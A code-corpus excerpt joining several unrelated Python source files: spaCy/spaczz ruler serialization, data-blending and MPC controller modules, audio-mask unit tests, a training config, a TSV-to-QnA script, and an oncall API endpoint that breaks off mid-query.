>>> ruler.add_patterns([{"label": "AUTHOR", "pattern": "Kerouac",
"type": "fuzzy"}])
>>> ruler_bytes = ruler.to_bytes()
>>> isinstance(ruler_bytes, bytes)
True
"""
serial = {
"overwrite": self.overwrite,
"ent_id_sep": self.ent_id_sep,
"patterns": self.patterns,
"defaults": self.defaults,
}
return srsly.msgpack_dumps(serial)
def from_disk(
self: SpaczzRuler,
path: Union[str, Path],
*,
exclude: Iterable[str] = simple_frozen_list,
) -> SpaczzRuler:
"""Load the spaczz ruler from a file.
Expects a file containing newline-delimited JSON (JSONL)
with one entry per line.
Args:
path: The JSONL file to load.
exclude: For spaCy consistency.
Returns:
The loaded spaczz ruler.
Example:
>>> import os
>>> import tempfile
>>> import spacy
>>> from spaczz.pipeline import SpaczzRuler
>>> nlp = spacy.blank("en")
>>> ruler = SpaczzRuler(nlp)
>>> ruler.add_patterns([{"label": "AUTHOR", "pattern": "Kerouac",
"type": "fuzzy"}])
>>> with tempfile.TemporaryDirectory() as tmpdir:
>>> ruler.to_disk(f"{tmpdir}/ruler")
>>> new_ruler = SpaczzRuler(nlp)
>>> new_ruler = new_ruler.from_disk(f"{tmpdir}/ruler")
>>> "AUTHOR" in new_ruler
True
"""
path = ensure_path(path)
self.clear()
depr_patterns_path = path.with_suffix(".jsonl")
if depr_patterns_path.is_file():
patterns = srsly.read_jsonl(depr_patterns_path)
self.add_patterns(patterns)
else:
cfg = {}
deserializers_patterns = {
"patterns": lambda p: self.add_patterns(
srsly.read_jsonl(p.with_suffix(".jsonl"))
)
}
deserializers_cfg = {"cfg": lambda p: cfg.update(srsly.read_json(p))}
read_from_disk(path, deserializers_cfg, {})
self.overwrite = cfg.get("overwrite", False)
self.defaults = cfg.get("defaults", {})
if self.defaults.get("fuzzy_defaults"):
self.fuzzy_matcher = FuzzyMatcher(
self.nlp.vocab, **self.defaults["fuzzy_defaults"]
)
if self.defaults.get("regex_defaults"):
self.regex_matcher = RegexMatcher(
self.nlp.vocab, **self.defaults["regex_defaults"]
)
if self.defaults.get("token_defaults"):
self.token_matcher = TokenMatcher(
self.nlp.vocab, **self.defaults["token_defaults"]
)
self.ent_id_sep = cfg.get("ent_id_sep", DEFAULT_ENT_ID_SEP)
read_from_disk(path, deserializers_patterns, {})
return self
def to_disk(
self: SpaczzRuler,
path: Union[str, Path],
*,
exclude: Iterable[str] = simple_frozen_list,
) -> None:
"""Save the spaczz ruler patterns to a directory.
The patterns will be saved as newline-delimited JSON (JSONL).
Args:
path: The JSONL file to save.
exclude: For spaCy consistency.
Example:
>>> import os
>>> import tempfile
>>> import spacy
>>> from spaczz.pipeline import SpaczzRuler
>>> nlp = spacy.blank("en")
>>> ruler = SpaczzRuler(nlp)
>>> ruler.add_patterns([{"label": "AUTHOR", "pattern": "Kerouac",
"type": "fuzzy"}])
>>> with tempfile.TemporaryDirectory() as tmpdir:
>>> ruler.to_disk(f"{tmpdir}/ruler")
>>> isdir = os.path.isdir(f"{tmpdir}/ruler")
>>> isdir
True
"""
path = ensure_path(path)
cfg = {
"overwrite": self.overwrite,
"defaults": self.defaults,
"ent_id_sep": self.ent_id_sep,
}
serializers = {
"patterns": lambda p: srsly.write_jsonl(
p.with_suffix(".jsonl"), self.patterns
),
"cfg": lambda p: srsly.write_json(p, cfg),
}
if path.suffix == ".jsonl": # user wants to save only JSONL
srsly.write_jsonl(path, self.patterns)
else:
write_to_disk(path, serializers, {})
def _add_patterns(
self: SpaczzRuler,
fuzzy_patterns: List[Dict[str, Any]],
regex_patterns: List[Dict[str, Any]],
token_patterns: List[Dict[str, Any]],
) -> None:
"""Helper function for add_patterns."""
for entry in fuzzy_patterns + regex_patterns + token_patterns:
label = entry["label"]
if "id" in entry:
ent_label = label
label = self._create_label(label, entry["id"])
self._ent_ids[label] = (ent_label, entry["id"])
pattern = entry["pattern"]
if isinstance(pattern, Doc):
self.fuzzy_patterns[label]["patterns"].append(pattern)
self.fuzzy_patterns[label]["kwargs"].append(entry["kwargs"])
elif isinstance(pattern, str):
self.regex_patterns[label]["patterns"].append(pattern)
self.regex_patterns[label]["kwargs"].append(entry["kwargs"])
elif isinstance(pattern, list):
self.token_patterns[label].append(pattern)
else:
raise ValueError(
(
"One or more patterns do not conform",
"to spaczz pattern structure:",
"{label (str), pattern (str or list), type (str),",
"optional kwargs (dict[str, Any]),",
"and optional id (str)}.",
)
)
for label, patterns in self.fuzzy_patterns.items():
self.fuzzy_matcher.add(label, patterns["patterns"], patterns["kwargs"])
for label, patterns in self.regex_patterns.items():
self.regex_matcher.add(label, patterns["patterns"], patterns["kwargs"])
for label, _token_patterns in self.token_patterns.items():
self.token_matcher.add(label, _token_patterns)
def _create_label(self: SpaczzRuler, label: str, ent_id: Union[str, None]) -> str:
"""Join Entity label with ent_id if the pattern has an id attribute.
Args:
label: The entity label.
ent_id: The optional entity id.
Returns:
The label and ent_id joined with configured ent_id_sep.
"""
if isinstance(ent_id, str):
label = "{}{}{}".format(label, self.ent_id_sep, ent_id)
return label
def _split_label(self: SpaczzRuler, label: str) -> Tuple[str, Union[str, None]]:
"""Split Entity label into ent_label and ent_id if it contains self.ent_id_sep.
Args:
label: The value of label in a pattern entry
Returns:
The separated ent_label and optional ent_id.
"""
if self.ent_id_sep in label:
ent_label, ent_id = label.rsplit(self.ent_id_sep, 1)
return ent_label, ent_id
else:
ent_label = label
return ent_label, None
@staticmethod
def _filter_overlapping_matches(
matches: List[Tuple[str, int, int]],
lookup: DefaultDict[str, Dict[Tuple[str, int, int], Any]],
) -> Tuple[
List[Tuple[str, int, int]], DefaultDict[str, Dict[Tuple[str, int, int], Any]]
]:
"""Prevents multiple match spans from overlapping.
Expects matches to be pre-sorted by matcher priority,
with each matcher's matches being pre-sorted by descending length,
then ascending start index, then descending match score
If more than one match span includes the same tokens
the first of these match spans in matches is kept.
It also removes non-kept matches from the lookup dict as well.
Args:
matches: List of match span tuples
(match_id, start_index, end_index).
lookup: Match ratio, count and detail values in
a `defaultdict(dict)`.
Returns:
The filtered list of match span tuples.
"""
filtered_matches: List[Tuple[str, int, int]] = []
for match in matches:
if not set(range(match[1], match[2])).intersection(
chain(*[set(range(n[1], n[2])) for n in filtered_matches])
):
filtered_matches.append(match)
if match in lookup["ratios"]:
_ = lookup["counts"].pop(match, None)
_ = lookup["details"].pop(match, None)
elif match in lookup["counts"]:
_ = lookup["details"].pop(match, None)
return filtered_matches, lookup
@staticmethod
def _update_custom_attrs(
span: Span,
match_id: str,
lookup: DefaultDict[str, Dict[Tuple[str, int, int], Any]],
) -> Span:
"""Update custom attributes for matches."""
ratio = lookup["ratios"].get((match_id, span.start, span.end))
counts = lookup["counts"].get((match_id, span.start, span.end))
details = lookup["details"].get((match_id, span.start, span.end))
for token in span:
token._.spaczz_token = True
if ratio:
token._.spaczz_ratio = ratio
token._.spaczz_type = "fuzzy"
elif counts:
token._.spaczz_counts = counts
token._.spaczz_type = "regex"
elif details:
token._.spaczz_details = details
token._.spaczz_type = "token"
return span
|
test/itest_close.py | tnakagawa/lit | 560 | 12652922 | <reponame>tnakagawa/lit
import testlib
import test_combinators
def forward(env):
lit1 = env.lits[0]
lit2 = env.lits[1]
test_combinators.run_close_test(env, lit1, lit2, lit1)
def reverse(env):
lit1 = env.lits[0]
lit2 = env.lits[1]
test_combinators.run_close_test(env, lit1, lit2, lit1)
|
examples/research_projects/movement-pruning/emmental/modules/__init__.py | liminghao1630/transformers | 50,404 | 12652923 | <gh_stars>1000+
# flake8: noqa
from .binarizer import MagnitudeBinarizer, ThresholdBinarizer, TopKBinarizer
from .masked_nn import MaskedLinear
|
fireant/dataset/data_blending.py | mikeengland/fireant | 122 | 12652928 | <gh_stars>100-1000
from fireant.dataset.fields import Field
from fireant.dataset.klass import DataSet
from fireant.queries.builder import (
DataSetBlenderQueryBuilder,
DimensionChoicesQueryBuilder,
)
from fireant.utils import (
deepcopy,
immutable,
ordered_distinct_list_by_attr,
)
def _wrap_dataset_fields(dataset):
if isinstance(dataset, DataSetBlender):
return dataset.fields
wrapped_fields = []
for field in dataset.fields:
wrapped_field = _wrap_field(dataset, field)
wrapped_fields.append(wrapped_field)
return wrapped_fields
def _wrap_field(dataset, field):
wrapped_field = Field(
alias=field.alias,
definition=field,
data_type=field.data_type,
label=field.label,
hint_table=field.hint_table,
prefix=field.prefix,
suffix=field.suffix,
thousands=field.thousands,
precision=field.precision,
hyperlink_template=field.hyperlink_template,
)
if not field.definition.is_aggregate:
wrapped_field.choices = DimensionChoicesBlenderQueryBuilder(dataset, field)
return wrapped_field
class DataSetBlender:
"""
The DataSetBlender class is the DataSet equivalent for implementing data blending, across distinct DataSet
instances.
"""
def __init__(self, primary_dataset, secondary_dataset, dimension_map):
"""
Constructor for a blended dataset. Contains all the fields to initialize the dataset.
:param primary_dataset: (Required)
The primary dataset, which table will be used as part of the FROM expression. This can be either a `DataSet`
or another `DataSetBlender`, which means multiple DataSet instances can be blended by chaining together
blenders.
:param secondary_dataset: (Required)
The dataset being blended. This should be a `DataSet` instance. (It might actually work with an instance of
`DataSetBlender` as well, though.)
:param dimension_map:
A dict mapping up fields from the primary to the secondary dataset. This tells the Blender which fields
can be used as dimensions in the Blender queries.
"""
self.primary_dataset = primary_dataset
self.secondary_dataset = secondary_dataset
self.dimension_map = dimension_map
# Wrap all dataset fields with another field on top so that:
# 1. DataSetBlender doesn't share a reference to a field with a DataSet (__hash__ is used to find out which
# dataset the field is in - see the Field class' __hash__ method for more details)
# 2. When complex fields are added, the `definition` attribute will always have at least one field within
# its object graph
self.fields = DataSet.Fields(
ordered_distinct_list_by_attr(
[*_wrap_dataset_fields(primary_dataset), *_wrap_dataset_fields(secondary_dataset)],
)
)
# add query builder entry points
self.query = DataSetBlenderQueryBuilder(self)
self.latest = self.primary_dataset.latest
self.annotation = None
@property
def return_additional_metadata(self) -> bool:
# When using data blending, datasets are nested inside DataSetBlender objects. Additionally,
# the primary_dataset can be a combination of datasets depending on how many datasets are being blended.
# This helper property walks the tree to return the return_additional_metadata value from the original
# primary dataset.
dataset = self.primary_dataset
while not isinstance(dataset, DataSet):
dataset = dataset.primary_dataset
return dataset.return_additional_metadata
def __eq__(self, other):
return isinstance(other, DataSetBlender) and self.fields == other.fields
def __repr__(self):
return "BlendedDataSet(fields=[{}])".format(",".join([repr(f) for f in self.fields]))
def __hash__(self):
return hash((self.primary_dataset, self.secondary_dataset, self.fields))
def __deepcopy__(self, memodict={}):
for field in self.dimension_map.values():
memodict[id(field)] = field
return deepcopy(self, memodict)
@property
def table(self):
return None
@property
def database(self):
return self.primary_dataset.database
@immutable
def extra_fields(self, *fields):
for field in fields:
self.fields.add(field)
def blend(self, other):
"""
Returns a Data Set blender which enables to execute queries on multiple data sets and combine them.
"""
return DataSetBlenderBuilder(self, other)
class DataSetBlenderBuilder:
def __init__(self, primary, secondary):
self.primary_dataset = primary
self.secondary_dataset = secondary
def on(self, dimension_map):
return DataSetBlender(self.primary_dataset, self.secondary_dataset, dimension_map)
def on_dimensions(self):
"""
This function doesn't work when blending more than 2 datasets. It won't select dimensions in the 3rd dataset
and further. self.primary_dataset might be a DataSetBlender object itself. We would want to dig deeper until
we find the actual primary dataset.
"""
dimension_map = {}
for secondary_ds_field in self.secondary_dataset.fields:
is_aggregate_field = secondary_ds_field.is_aggregate
matches_alias_in_primary_dataset = secondary_ds_field.alias in self.primary_dataset.fields
if is_aggregate_field or not matches_alias_in_primary_dataset:
continue
primary_ds_field = self.primary_dataset.fields[secondary_ds_field.alias]
dimension_map[primary_ds_field] = secondary_ds_field
return self.on(dimension_map)
class DimensionChoicesBlenderQueryBuilder(DimensionChoicesQueryBuilder):
def filter(self, *filters, **kwargs):
filters = [fltr.for_(fltr.field.definition) for fltr in filters if fltr.field.definition in self.dataset.fields]
return super().filter(*filters, **kwargs)
|
PythonLinearNonlinearControl/controllers/mpc.py | Geonhee-LEE/PythonLinearNonlinearControl | 425 | 12652946 | <reponame>Geonhee-LEE/PythonLinearNonlinearControl
from logging import getLogger
import numpy as np
from scipy.optimize import minimize
from scipy.optimize import LinearConstraint
from .controller import Controller
from ..envs.cost import calc_cost
logger = getLogger(__name__)
class LinearMPC(Controller):
""" Model Predictive Controller for linear model
Attributes:
A (numpy.ndarray): system matrix, shape(state_size, state_size)
B (numpy.ndarray): input matrix, shape(state_size, input_size)
Q (numpy.ndarray): cost function weight for states
R (numpy.ndarray): cost function weight for states
history_us (list[numpy.ndarray]): time history of optimal input
Ref:
<NAME>. (2002). Predictive control: with constraints.
"""
def __init__(self, config, model):
"""
Args:
model (Model): system matrix, shape(state_size, state_size)
config (ConfigModule): input matrix, shape(state_size, input_size)
"""
if config.TYPE != "Linear":
raise ValueError("{} could be not applied to \
this controller".format(model))
super(LinearMPC, self).__init__(config, model)
# system parameters
self.model = model
self.A = model.A
self.B = model.B
self.state_size = config.STATE_SIZE
self.input_size = config.INPUT_SIZE
self.pred_len = config.PRED_LEN
# get cost func
self.state_cost_fn = config.state_cost_fn
self.terminal_state_cost_fn = config.terminal_state_cost_fn
self.input_cost_fn = config.input_cost_fn
# cost parameters
self.Q = config.Q
self.R = config.R
self.Qs = None
self.Rs = None
# constraints
self.dt_input_lower_bound = config.DT_INPUT_LOWER_BOUND
self.dt_input_upper_bound = config.DT_INPUT_UPPER_BOUND
self.input_lower_bound = config.INPUT_LOWER_BOUND
self.input_upper_bound = config.INPUT_UPPER_BOUND
# setup controllers
self.W = None
self.omega = None
self.F = None
self.f = None
self.setup()
self.prev_sol = np.zeros(self.input_size*self.pred_len)
# history
self.history_u = [np.zeros(self.input_size)]
def setup(self):
"""
setup Model Predictive Control as a quadratic programming
"""
A_factorials = [self.A]
self.phi_mat = self.A.copy()
for _ in range(self.pred_len - 1):
temp_mat = np.matmul(A_factorials[-1], self.A)
self.phi_mat = np.vstack((self.phi_mat, temp_mat))
A_factorials.append(temp_mat) # after we use this factorials
self.gamma_mat = self.B.copy()
gammma_mat_temp = self.B.copy()
for i in range(self.pred_len - 1):
temp_1_mat = np.matmul(A_factorials[i], self.B)
gammma_mat_temp = temp_1_mat + gammma_mat_temp
self.gamma_mat = np.vstack((self.gamma_mat, gammma_mat_temp))
self.theta_mat = self.gamma_mat.copy()
for i in range(self.pred_len - 1):
temp_mat = np.zeros_like(self.gamma_mat)
temp_mat[int((i + 1)*self.state_size):, :] =\
self.gamma_mat[:-int((i + 1)*self.state_size), :]
self.theta_mat = np.hstack((self.theta_mat, temp_mat))
# evaluation function weight
diag_Qs = np.tile(np.diag(self.Q), self.pred_len)
diag_Rs = np.tile(np.diag(self.R), self.pred_len)
self.Qs = np.diag(diag_Qs)
self.Rs = np.diag(diag_Rs)
# constraints
# about inputs
if self.input_lower_bound is not None:
self.F = np.zeros((self.input_size * 2,
self.pred_len * self.input_size))
for i in range(self.input_size):
self.F[i * 2: (i + 1) * 2, i] = np.array([1., -1.])
temp_F = self.F.copy()
for i in range(self.pred_len - 1):
for j in range(self.input_size):
temp_F[j * 2: (j + 1) * 2,
((i+1) * self.input_size) + j] = np.array([1., -1.])
self.F = np.vstack((self.F, temp_F))
self.F1 = self.F[:, :self.input_size]
temp_f = []
for i in range(self.input_size):
temp_f.append(-1 * self.input_upper_bound[i])
temp_f.append(self.input_lower_bound[i])
self.f = np.tile(np.array(temp_f).flatten(), self.pred_len)
# about dt_input constraints
if self.dt_input_lower_bound is not None:
self.W = np.zeros((2, self.pred_len * self.input_size))
self.W[:, 0] = np.array([1., -1.])
for i in range(self.pred_len * self.input_size - 1):
temp_W = np.zeros((2, self.pred_len * self.input_size))
temp_W[:, i+1] = np.array([1., -1.])
self.W = np.vstack((self.W, temp_W))
temp_omega = []
for i in range(self.input_size):
temp_omega.append(self.dt_input_upper_bound[i])
temp_omega.append(-1. * self.dt_input_lower_bound[i])
self.omega = np.tile(np.array(temp_omega).flatten(),
self.pred_len)
def obtain_sol(self, curr_x, g_xs):
""" calculate the optimal inputs
Args:
curr_x (numpy.ndarray): current state, shape(state_size, )
g_xs (numpy.ndarrya): goal trajectory,
shape(plan_len+1, state_size)
Returns:
opt_input (numpy.ndarray): optimal input, shape(input_size, )
"""
temp_1 = np.matmul(self.phi_mat, curr_x.reshape(-1, 1))
temp_2 = np.matmul(self.gamma_mat, self.history_u[-1].reshape(-1, 1))
error = g_xs[1:].reshape(-1, 1) - temp_1 - temp_2
G = np.matmul(self.theta_mat.T, np.matmul(self.Qs, error))
H = np.matmul(self.theta_mat.T, np.matmul(self.Qs, self.theta_mat)) \
+ self.Rs
H = H * 0.5
# constraints
A = []
b = []
if self.W is not None:
A.append(self.W)
b.append(self.omega.reshape(-1, 1))
if self.F is not None:
b_F = - np.matmul(self.F1, self.history_u[-1].reshape(-1, 1)) \
- self.f.reshape(-1, 1)
A.append(self.F)
b.append(b_F)
A = np.array(A).reshape(-1, self.input_size * self.pred_len)
ub = np.array(b).flatten()
# using cvxopt
def optimized_func(dt_us):
return (np.dot(dt_us, np.dot(H, dt_us.reshape(-1, 1)))
- np.dot(G.T, dt_us.reshape(-1, 1)))[0]
# constraint
lb = np.array([-np.inf for _ in range(len(ub))]) # one side cons
cons = LinearConstraint(A, lb, ub)
# solve
opt_sol = minimize(optimized_func, self.prev_sol.flatten(),
constraints=[cons])
opt_dt_us = opt_sol.x
""" using cvxopt ver,
if you want to solve more quick please use cvxopt instead of scipy
# make cvxpy problem formulation
P = 2*matrix(H)
q = matrix(-1 * G)
A = matrix(A)
b = matrix(ub)
# solve the problem
opt_sol = solvers.qp(P, q, G=A, h=b)
opt_dt_us = np.array(list(opt_sol['x']))
"""
# to dt form
opt_dt_u_seq = np.cumsum(opt_dt_us.reshape(self.pred_len,
self.input_size),
axis=0)
self.prev_sol = opt_dt_u_seq.copy()
opt_u_seq = opt_dt_u_seq + self.history_u[-1]
# save
self.history_u.append(opt_u_seq[0])
# check costs
costs = self.calc_cost(curr_x,
opt_u_seq.reshape(1,
self.pred_len,
self.input_size),
g_xs)
logger.debug("Cost = {}".format(costs))
return opt_u_seq[0]
def __str__(self):
return "LinearMPC"
|
exercises/ja/test_01_02_01.py | Jette16/spacy-course | 2,085 | 12652971 | def test():
import spacy.tokens
import spacy.lang.en
assert isinstance(
nlp, spacy.lang.en.English
), "nlpオブジェクトはEnglishクラスのインスタンスでなければなりません"
assert isinstance(doc, spacy.tokens.Doc), "テキストをnlpオブジェクトで処理してdocを作成しましたか?"
assert "print(doc.text)" in __solution__, "doc.textをプリントしましたか?"
__msg__.good("正解です!")
|
kaggle/RANZCR/4th_place_solution/configs/default_config.py | tommydino93/tutorials | 535 | 12652983 | import os
from types import SimpleNamespace
cfg = SimpleNamespace(**{})
# data path
cfg.data_dir = "/workspace/data/ranzcr/"
cfg.data_folder = cfg.data_dir + "train/"
cfg.train_df = cfg.data_dir + "train_folds.csv"
cfg.test_df = cfg.data_dir + "sample_submission.csv"
cfg.output_dir = "./output/weights/"
# dataset
cfg.batch_size = 4
cfg.img_size = (896, 896)
cfg.train_aug = None
cfg.val_aug = None
cfg.label_cols = [
"ETT - Abnormal",
"ETT - Borderline",
"ETT - Normal",
"NGT - Abnormal",
"NGT - Borderline",
"NGT - Incompletely Imaged",
"NGT - Normal",
"CVC - Abnormal",
"CVC - Borderline",
"CVC - Normal",
"Swan Ganz Catheter Present",
]
cfg.num_classes = len(cfg.label_cols)
# mask
cfg.thickness = 32
cfg.seg_weight = 50
# model
cfg.backbone = "tf_efficientnet_b8_ap"
cfg.pretrained = True
cfg.pretrained_weights = None
cfg.train = True
cfg.seg_dim = 3
cfg.image_extension = ".jpg"
# training
cfg.fold = -1
cfg.lr = 1e-4
cfg.weight_decay = 0
cfg.epochs = 15
cfg.seed = -1
cfg.calc_loss = True
cfg.train_val = False
cfg.eval_epochs = 1
cfg.eval_train_epochs = 20
cfg.warmup = 5
cfg.compute_auc = True
# ressources
cfg.find_unused_parameters = True
cfg.mixed_precision = True
cfg.grad_accumulation = 1
cfg.gpu = 0
cfg.device = "cuda:%d" % cfg.gpu
cfg.num_workers = 8
cfg.drop_last = True
basic_cfg = cfg
|
test/cut/test_masks.py | stachu86/lhotse | 353 | 12652994 | <filename>test/cut/test_masks.py<gh_stars>100-1000
from itertools import chain
from unittest.mock import Mock
import numpy as np
import pytest
from lhotse import MonoCut, SupervisionSegment
from lhotse.cut import PaddingCut
from lhotse.supervision import AlignmentItem
from lhotse.utils import LOG_EPSILON
class TestMasksWithoutSupervisions:
def test_cut_audio_mask(self):
cut = MonoCut(
"cut", start=0, duration=2, channel=0, recording=Mock(sampling_rate=16000)
)
mask = cut.supervisions_audio_mask()
assert mask.sum() == 0
def test_cut_features_mask(self):
cut = MonoCut(
"cut",
start=0,
duration=2,
channel=0,
features=Mock(sampling_rate=16000, frame_shift=0.01, num_frames=2000),
)
mask = cut.supervisions_feature_mask()
assert mask.sum() == 0
def test_padding_cut_audio_mask(self):
cut = PaddingCut(
"cut",
duration=2,
sampling_rate=16000,
feat_value=LOG_EPSILON,
num_samples=32000,
)
mask = cut.supervisions_audio_mask()
assert mask.sum() == 0
def test_padding_cut_features_mask(self):
cut = PaddingCut(
"cut",
duration=2,
sampling_rate=16000,
feat_value=LOG_EPSILON,
num_frames=2000,
num_features=13,
)
mask = cut.supervisions_feature_mask()
assert mask.sum() == 0
def test_mixed_cut_audio_mask(self):
cut = MonoCut(
"cut", start=0, duration=2, channel=0, recording=Mock(sampling_rate=16000)
)
mixed_cut = cut.append(cut)
mask = mixed_cut.supervisions_audio_mask()
assert mask.sum() == 0
def test_mixed_cut_features_mask(self):
cut = MonoCut(
"cut",
start=0,
duration=2,
channel=0,
features=Mock(sampling_rate=16000, frame_shift=0.01),
)
mixed_cut = cut.append(cut)
mask = mixed_cut.supervisions_feature_mask()
assert mask.sum() == 0
@pytest.fixture
def supervisions():
return [
SupervisionSegment(
"sup",
"rec",
start=0,
duration=0.5,
speaker="SpkA",
alignment={
"word": [
AlignmentItem(symbol="a", start=0, duration=0.1),
AlignmentItem(symbol="b", start=0.2, duration=0.2),
]
},
),
SupervisionSegment(
"sup",
"rec",
start=0.6,
duration=0.2,
speaker="SpkB",
alignment={
"word": [
AlignmentItem(symbol="a", start=0.6, duration=0.2),
]
},
),
]
class TestMasksWithSupervisions:
@pytest.mark.parametrize("alignment", [None, "word"])
def test_cut_audio_mask(self, supervisions, alignment):
cut = MonoCut(
"cut",
start=0,
duration=2,
channel=0,
recording=Mock(sampling_rate=16000),
supervisions=supervisions,
)
mask = cut.supervisions_audio_mask(use_alignment_if_exists=alignment)
if alignment == "word":
ones = np.index_exp[
list(chain(range(0, 1600), range(3200, 6400), range(9600, 12800)))
]
zeros = np.index_exp[
list(chain(range(1600, 3200), range(6400, 9600), range(12800, 32000)))
]
else:
ones = np.index_exp[list(chain(range(0, 8000), range(9600, 12800)))]
zeros = np.index_exp[list(chain(range(8000, 9600), range(12800, 32000)))]
assert (mask[ones] == 1).all()
assert (mask[zeros] == 0).all()
@pytest.mark.parametrize("alignment", [None, "word"])
def test_cut_features_mask(self, supervisions, alignment):
cut = MonoCut(
"cut",
start=0,
duration=2,
channel=0,
features=Mock(sampling_rate=16000, frame_shift=0.01, num_frames=2000),
supervisions=supervisions,
)
mask = cut.supervisions_feature_mask(use_alignment_if_exists=alignment)
if alignment == "word":
ones = np.index_exp[list(chain(range(0, 10), range(20, 40), range(60, 80)))]
zeros = np.index_exp[
list(chain(range(10, 20), range(40, 60), range(80, 200)))
]
else:
ones = np.index_exp[list(chain(range(0, 50), range(60, 80)))]
zeros = np.index_exp[list(chain(range(50, 60), range(80, 200)))]
assert (mask[ones] == 1).all()
assert (mask[zeros] == 0).all()
@pytest.mark.parametrize("alignment", [None, "word"])
def test_cut_speakers_audio_mask(self, supervisions, alignment):
cut = MonoCut(
"cut",
start=0,
duration=2,
channel=0,
recording=Mock(sampling_rate=16000),
supervisions=supervisions,
)
mask = cut.speakers_audio_mask(use_alignment_if_exists=alignment)
if alignment == "word":
ones = [
np.index_exp[list(chain(range(0, 1600), range(3200, 6400)))],
np.index_exp[list(chain(range(9600, 12800)))],
]
zeros = [
np.index_exp[list(chain(range(1600, 3200), range(6400, 32000)))],
np.index_exp[list(chain(range(0, 9600), range(12800, 32000)))],
]
else:
ones = [np.index_exp[range(0, 8000)], np.index_exp[range(9600, 12800)]]
zeros = [
np.index_exp[list(chain(range(8000, 32000)))],
np.index_exp[list(chain(range(0, 9600), range(12800, 32000)))],
]
assert (mask[0, ones[0]] == 1).all()
assert (mask[1, ones[1]] == 1).all()
assert (mask[0, zeros[0]] == 0).all()
assert (mask[1, zeros[1]] == 0).all()
@pytest.mark.parametrize("alignment", [None, "word"])
def test_cut_speakers_features_mask(self, supervisions, alignment):
cut = MonoCut(
"cut",
start=0,
duration=2,
channel=0,
features=Mock(sampling_rate=16000, frame_shift=0.01, num_frames=2000),
supervisions=supervisions,
)
mask = cut.speakers_feature_mask(use_alignment_if_exists=alignment)
if alignment == "word":
ones = [
np.index_exp[list(chain(range(0, 10), range(20, 40)))],
np.index_exp[list(chain(range(60, 80)))],
]
zeros = [
np.index_exp[list(chain(range(10, 20), range(40, 200)))],
np.index_exp[list(chain(range(0, 60), range(80, 200)))],
]
else:
ones = [
np.index_exp[list(chain(range(0, 50)))],
np.index_exp[list(chain(range(60, 80)))],
]
zeros = [
np.index_exp[list(chain(range(50, 200)))],
np.index_exp[list(chain(range(0, 60), range(80, 200)))],
]
assert (mask[0, ones[0]] == 1).all()
assert (mask[1, ones[1]] == 1).all()
assert (mask[0, zeros[0]] == 0).all()
assert (mask[1, zeros[1]] == 0).all()
def test_mixed_cut_audio_mask(self, supervisions):
cut = MonoCut(
"cut",
start=0,
duration=2,
channel=0,
recording=Mock(sampling_rate=16000),
supervisions=supervisions,
)
mixed_cut = cut.append(cut)
mask = mixed_cut.supervisions_audio_mask()
ones = np.index_exp[
list(
chain(
range(0, 8000),
range(9600, 12800),
range(32000, 40000),
range(41600, 44800),
)
)
]
zeros = np.index_exp[
list(
chain(
range(8000, 9600),
range(12800, 32000),
range(40000, 41600),
range(44800, 64000),
)
)
]
assert (mask[ones] == 1).all()
assert (mask[zeros] == 0).all()
def test_mixed_cut_features_mask(self, supervisions):
cut = MonoCut(
"cut",
start=0,
duration=2,
channel=0,
features=Mock(sampling_rate=16000, frame_shift=0.01),
supervisions=supervisions,
)
mixed_cut = cut.append(cut)
mask = mixed_cut.supervisions_feature_mask()
ones = np.index_exp[
list(chain(range(0, 50), range(60, 80), range(200, 250), range(260, 280)))
]
zeros = np.index_exp[
list(chain(range(50, 60), range(80, 200), range(250, 260), range(280, 400)))
]
assert (mask[ones] == 1).all()
assert (mask[zeros] == 0).all()
|
tools/scripts/ChitChatUpdate.py | gamontal/botframework-solutions | 601 | 12653040 | import argparse
import os
import typing
import functools
parser = argparse.ArgumentParser(description='Convert tsv to lu')
parser.add_argument('file',type=str)
parser.add_argument('-s','--source',type=str,default='custom editorial')
parser.add_argument('-o','--out',type=str,default=None)
args = parser.parse_args()
with open(args.file, 'r', encoding='utf-8') as fin:
# TODO skip first line
lines = fin.readlines()[1:]
class Questions:
def __init__(self, source: str, metadata: str):
self.questions = []
self.source = source
if metadata:
metadata = metadata.split(':')
self.metadatas = [[metadata[0], metadata[1]]]
else:
self.metadatas = []
def WriteToFile(self, fout: typing.IO, answer: str):
def writeLine(*args):
for arg in args:
fout.write(arg)
fout.write('\n')
writeLine('> Source: ', self.source)
writeLine('## ? ', self.questions[0])
for i in range(1, len(self.questions)):
writeLine('- ', self.questions[i])
writeLine()
if self.metadatas:
writeLine('**Filters:**')
for metadata in self.metadatas:
writeLine('- {0} = {1}'.format(metadata[0], metadata[1]))
writeLine()
writeLine('```markdown')
writeLine(answer)
writeLine('```')
writeLine()
answerToQuestions: typing.Dict[str, Questions] = {}
for line in lines:
line = line.split('\t')
question = line[0]
answer = line[1]
source = line[2].strip() if len(line) >= 3 else parser.source
metadata = line[3].strip() if len(line) >= 4 else None
questions = answerToQuestions.setdefault(answer, Questions(source, metadata))
questions.questions.append(question)
print('lines {0} answers {1} questions {2}'.format(len(lines), len(answerToQuestions), functools.reduce(lambda a, b: len(a.questions) + len(b.questions) if isinstance(a, Questions) else a + len(b.questions), answerToQuestions.values())))
with open(args.out if args.out else args.file + '.qna', 'w', encoding='utf-8') as fout:
for k, v in answerToQuestions.items():
v.WriteToFile(fout, k) |
src/oncall/api/v0/team_admin.py | navoday-91/oncall | 857 | 12653107 | <reponame>navoday-91/oncall
# Copyright (c) LinkedIn Corporation. All rights reserved. Licensed under the BSD-2 Clause license.
# See LICENSE in the project root for license information.
from falcon import HTTPNotFound
from ...auth import login_required, check_team_auth
from ... import db
from ...utils import unsubscribe_notifications, create_audit
from ...constants import ADMIN_DELETED
@login_required
def on_delete(req, resp, team, user):
"""
Delete team admin user. Removes admin from the team if he/she is not a member of any roster.
**Example request:**
.. sourcecode:: http
DELETE /api/v0/teams/team-foo/admins/jdoe HTTP/1.1
:statuscode 200: Successful delete
:statuscode 404: Team admin not found
"""
check_team_auth(team, req)
connection = db.connect()
cursor = connection.cursor()
cursor.execute('''DELETE FROM `team_admin`
WHERE `team_id`=(SELECT `id` FROM `team` WHERE `name`=%s)
AND `user_id`=(SELECT `id` FROM `user` WHERE `name`=%s)''',
(team, user))
deleted = cursor.rowcount
if deleted == 0:
raise HTTPNotFound()
create_audit({'user': user}, team, ADMIN_DELETED, req, cursor)
# Remove user from the team if needed
query = '''DELETE FROM `team_user` WHERE `user_id` = (SELECT `id` FROM `user` WHERE `name`=%s) AND `user_id` NOT IN
(SELECT `roster_user`.`user_id`
FROM `roster_user` JOIN `roster` ON `roster`.`id` = `roster_user`.`roster_id`
